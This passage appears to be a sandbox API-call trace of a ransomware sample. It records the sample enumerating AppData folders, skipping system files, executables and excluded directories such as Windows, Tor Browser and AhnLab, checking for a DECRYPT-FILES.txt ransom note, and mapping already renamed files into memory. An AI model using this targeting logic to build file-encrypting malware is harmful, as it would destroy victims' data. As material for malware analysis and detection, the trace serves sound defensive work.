ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7bb000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.125] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee7bb000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7bb000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.125] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.125] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.125] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee7bb000, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee7bb000, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7bb000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.125] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.125] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.125] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.125] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.125] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.125] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.125] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0180.125] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.125] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\" [0180.125] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\0a16c9.tmp" [0180.125] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.126] CloseHandle (hObject=0x0) returned 0 [0180.126] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.126] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.126] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.126] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.126] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.126] CloseHandle (hObject=0x274) returned 1 [0180.126] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dictionaries\\", cAlternateFileName="DICTIO~1")) returned 0 [0180.126] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.126] CloseHandle (hObject=0x26c) returned 1 [0180.126] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0180.127] lstrcmpW (lpString1="LogTransport2", lpString2=".") returned 1 [0180.127] lstrcmpW (lpString1="LogTransport2", lpString2="..") returned 1 [0180.127] lstrcatW (in: lpString1="LogTransport2", lpString2="\\" | out: lpString1="LogTransport2\\") returned="LogTransport2\\" [0180.127] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="LogTransport2\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Program Files") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch=":\\Windows") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Games\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\All Users") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="AhnLab") returned 0x0 [0180.127] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.127] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0180.127] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.127] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\0a16c9.tmp") returned 77 [0180.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.127] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0180.128] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.128] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\DECRYPT-FILES.txt") returned 84 [0180.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.128] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0180.128] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0180.128] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee7e1160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7e1160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.128] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.128] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee7e1160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7e1160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.128] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.128] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.128] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee7e1160, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee7e1160, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee7e1160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.128] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.128] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.128] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.128] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.128] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.128] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.128] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0180.128] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.129] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0180.129] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\0a16c9.tmp" [0180.129] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.129] CloseHandle (hObject=0x0) returned 0 [0180.129] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.129] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.129] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.129] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.129] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.129] CloseHandle (hObject=0x26c) returned 1 [0180.129] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2\\", cAlternateFileName="LOGTRA~1")) returned 0 [0180.129] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0180.130] CloseHandle (hObject=0x264) returned 1 [0180.131] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2e41510, ftCreationTime.dwHighDateTime=0x1d4c749, ftLastAccessTime.dwLowDateTime=0xd4dcb8a0, ftLastAccessTime.dwHighDateTime=0x1d4caea, ftLastWriteTime.dwLowDateTime=0xaa112940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11919, dwReserved0=0x0, dwReserved1=0x0, cFileName="ajTbqxKluAP5yMsiQz.mkv.YBZH", cAlternateFileName="AJTBQX~1.YBZ")) returned 1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="DECRYPT-FILES.txt") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="autorun.inf") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="boot.ini") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="desktop.ini") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="ntuser.dat") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="iconcache.db") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="bootsect.bak") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="ntuser.dat.log") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="thumbs.db") returned -1 [0180.131] lstrcmpiW (lpString1="ajTbqxKluAP5yMsiQz.mkv.YBZH", lpString2="Bootfont.bin") returned -1 [0180.131] lstrlenW (lpString="ajTbqxKluAP5yMsiQz.mkv.YBZH") returned 27 [0180.131] lstrcmpiW (lpString1="YBZH", lpString2="lnk") returned 1 [0180.131] lstrcmpiW (lpString1="YBZH", lpString2="exe") returned 1 [0180.131] lstrcmpiW (lpString1="YBZH", lpString2="sys") returned 1 [0180.131] lstrcmpiW (lpString1="YBZH", lpString2="dll") returned 1 [0180.131] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.131] lstrlenW (lpString="ajTbqxKluAP5yMsiQz.mkv.YBZH") returned 27 [0180.131] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.131] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ajTbqxKluAP5yMsiQz.mkv.YBZH" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv.YBZH") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv.YBZH" [0180.131] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ajTbqxKluAP5yMsiQz.mkv.YBZH" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ajtbqxkluap5ymsiqz.mkv.ybzh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.132] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=71961) returned 1 [0180.132] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.132] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.137] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.137] CloseHandle (hObject=0x268) returned 1 [0180.137] CloseHandle (hObject=0x264) returned 1 [0180.137] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.137] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3817e930, ftCreationTime.dwHighDateTime=0x1d4c771, ftLastAccessTime.dwLowDateTime=0x2abfc4a0, ftLastAccessTime.dwHighDateTime=0x1d4d514, ftLastWriteTime.dwLowDateTime=0xaa138aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd955, dwReserved0=0x0, dwReserved1=0x0, cFileName="akDBjfYtmaT.m4a.LjQ5", cAlternateFileName="AKDBJF~1.LJQ")) returned 1 [0180.137] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="DECRYPT-FILES.txt") returned -1 [0180.137] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="autorun.inf") returned -1 [0180.137] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="boot.ini") returned -1 [0180.137] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="desktop.ini") returned -1 [0180.137] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="ntuser.dat") returned -1 [0180.138] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="iconcache.db") returned -1 [0180.138] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="bootsect.bak") returned -1 [0180.138] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="ntuser.dat.log") returned -1 [0180.138] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="thumbs.db") returned -1 [0180.138] lstrcmpiW (lpString1="akDBjfYtmaT.m4a.LjQ5", lpString2="Bootfont.bin") returned -1 [0180.138] lstrlenW (lpString="akDBjfYtmaT.m4a.LjQ5") returned 20 [0180.138] lstrcmpiW (lpString1="LjQ5", lpString2="lnk") returned -1 [0180.138] lstrcmpiW (lpString1="LjQ5", lpString2="exe") returned 1 [0180.138] lstrcmpiW (lpString1="LjQ5", lpString2="sys") returned -1 [0180.138] lstrcmpiW (lpString1="LjQ5", lpString2="dll") returned 1 [0180.138] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.138] lstrlenW (lpString="akDBjfYtmaT.m4a.LjQ5") returned 20 [0180.138] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.138] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="akDBjfYtmaT.m4a.LjQ5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a.LjQ5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\akDBjfYtmaT.m4a.LjQ5" [0180.138] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 